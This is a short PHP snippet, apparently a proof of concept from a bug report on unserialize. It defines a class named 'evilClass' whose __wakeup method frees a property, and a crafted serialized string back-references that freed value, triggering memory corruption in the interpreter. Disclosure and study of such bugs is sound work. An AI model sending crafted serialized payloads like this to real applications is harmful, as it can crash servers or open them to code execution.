- unserialize: documentation ( source)
<?php
class evilClass {
public $var;
function __wakeup() {
unset($this->var);
// $this->var = 'ryat';
}
}
$data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}');